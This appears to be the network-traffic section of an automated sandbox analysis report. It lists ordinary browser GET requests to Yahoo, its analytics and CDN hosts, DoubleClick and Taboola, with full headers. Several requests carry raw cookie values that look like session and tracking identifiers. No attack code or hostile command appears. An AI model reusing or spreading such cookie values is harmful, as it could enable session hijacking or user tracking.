A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1
Source: global trafficHTTP traffic detected: GET /caas/content/article/?uuid=8551ac12-1fc9-3d5d-ab15-8e6326882e08,7a673a73-42b0-3bbf-8576-5ad2cdb23c41,73240f47-271e-3691-bf46-85ad4f19d81c&appid=news_web&device=desktop&lang=en-US&region=US&site=fp&partner=none&bucket=900,seamless&features=enableEVPlayer,enableOverrideSpaceId,contentFeedbackEnabled,enableAdFeedbackV2,enableInArticleAd,enableOpinionLabel,enableSingleSlotting,enableVideoDocking,outStream,showCommentsIconWithDynamicCount,enableStickyAds,showCommentsIconInShareSec,enableAdSlotsNewMap,enableGAMAds,enableGAMAdsOnLoad,enableFinancePremiumTicker,enableAdLiteUpSellFeedback,enableRRAtTop,enableCommentsCountInViewCommentsCta,enableRRAdsSlots,enableRRAdsSlotsWithJAC,newsModal,enableViewCommentsCTA&rid=1pa4ckpjflnfm HTTP/1.1Host: www.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-webp: 1sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1
Source: global trafficHTTP traffic detected: GET /tag/opus.js HTTP/1.1Host: opus.analytics.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-toggle-1.15.4-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/fp/js/react-wafer-featurebar.custom.modern.12732500bc8e47693f0d777bbe88001c.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-caas-1.36.6-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/c/1477f29.caas-news_web.min.css HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-fetch-1.19.1-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-lightbox-1.10.6-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-text-1.2.0-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-video-3.2.2-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pagead/managed/js/gpt/m202409240101/pubads_impl.js HTTP/1.1Host: securepubads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tag/js/gpt.js HTTP/1.1Host: securepubads.g.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ups/58784/sync?format=json&gdpr=false&gdpr_consent=&gpp=DBAA&gpp_sid=-1&us_privacy=1YNN HTTP/1.1Host: ups.analytics.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/jsonsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://www.yahoo.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-scrollview-2.23.3-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-bind-1.1.3-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-countdown-1.2.5-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-benji-1.2.0-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tag/opus.js HTTP/1.1Host: opus.analytics.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-image-1.4.0-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /libtrc/yahooweb-network/loader.js HTTP/1.1Host: cdn.taboola.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-beacon-1.3.4-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bid/yoo/adslot/13885/?pa=1 HTTP/1.1Host: gps-aa.ybp.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1
Source: global trafficHTTP traffic detected: GET /caas/content/article/?uuid=8551ac12-1fc9-3d5d-ab15-8e6326882e08,7a673a73-42b0-3bbf-8576-5ad2cdb23c41,73240f47-271e-3691-bf46-85ad4f19d81c&appid=news_web&device=desktop&lang=en-US&region=US&site=fp&partner=none&bucket=900,seamless&features=enableEVPlayer,enableOverrideSpaceId,contentFeedbackEnabled,enableAdFeedbackV2,enableInArticleAd,enableOpinionLabel,enableSingleSlotting,enableVideoDocking,outStream,showCommentsIconWithDynamicCount,enableStickyAds,showCommentsIconInShareSec,enableAdSlotsNewMap,enableGAMAds,enableGAMAdsOnLoad,enableFinancePremiumTicker,enableAdLiteUpSellFeedback,enableRRAtTop,enableCommentsCountInViewCommentsCta,enableRRAdsSlots,enableRRAdsSlotsWithJAC,newsModal,enableViewCommentsCTA&rid=1pa4ckpjflnfm HTTP/1.1Host: www.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1
Source: global trafficHTTP traffic detected: GET /caas/content/article/?uuid=2b2a262c-878f-3f65-9ba6-39ad37b780eb,b919e796-b03c-39fc-87e7-500abd2430fc,dce5eeb8-da4f-3016-b6b1-671a1b05f180,cc162679-b996-3b22-bf08-a33e637cd3e7,e83ce260-cc8d-4911-9251-00d71cd9beb8,877f8ab1-324b-3028-8015-3030372e4744,12f9c9af-c6c2-3c17-b79d-5f82604d80b2,9df6c4a7-8f43-3b8c-bc27-cbec371808d8,d6bedef8-7f7f-361b-a1ed-95df489e3d8b,17667347-cb18-3690-87e0-525837a669bf&appid=news_web&device=desktop&lang=en-US&region=US&site=fp&partner=none&bucket=900,seamless&features=enableEVPlayer,enableOverrideSpaceId,contentFeedbackEnabled,enableAdFeedbackV2,enableInArticleAd,enableOpinionLabel,enableSingleSlotting,enableVideoDocking,outStream,showCommentsIconWithDynamicCount,enableStickyAds,showCommentsIconInShareSec,enableAdSlotsNewMap,enableGAMAds,enableGAMAdsOnLoad,enableFinancePremiumTicker,enableAdLiteUpSellFeedback,enableRRAtTop,enableCommentsCountInViewCommentsCta,enableRRAdsSlots,enableRRAdsSlotsWithJAC,newsModal,enableViewCommentsCTA&rid=1pa4ckpjflnfm HTTP/1.1Host: www.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1
Source: global trafficHTTP traffic detected: GET /libtrc/static/topics/taboola-browsing-topics.html HTTP/1.1Host: cdn.taboola.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-clipboard-copy-1.0.2-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-rapid-1.10.9-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ups/58824/sync?format=json&gdpr=false&gdpr_consent=&gpp=DBAA&gpp_sid=-1&us_privacy=1YNN HTTP/1.1Host: ups.analytics.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/jsonsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://www.yahoo.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; IDSYNC=19cw~2kzt; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A
Source: global trafficHTTP traffic detected: GET /.well-known/interest-group/permissions/?origin=https%3A%2F%2Fgps-aa.ybp.yahoo.com HTTP/1.1Host: pa.ybp.yahoo.comConnection: keep-aliveAccept: application/jsonOrigin: https://gps-aa.ybp.yahoo.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/cprops/colors_1.1.27.min.css HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /manifest_desktop_us.json HTTP/1.1Host: www.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: manifestReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ups/58784/sync?format=json&gdpr=false&gdpr_consent=&gpp=DBAA&gpp_sid=-1&us_privacy=1YNN HTTP/1.1Host: ups.analytics.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; IDSYNC=19cw~2kzt; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-fetch-1.19.1-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/fp/css/react-wafer-weather.WeatherPreviewRefresh.atomic.ltr.2a251a0ddb3d7c4ec13f4e35ee35dd2b.min.css HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
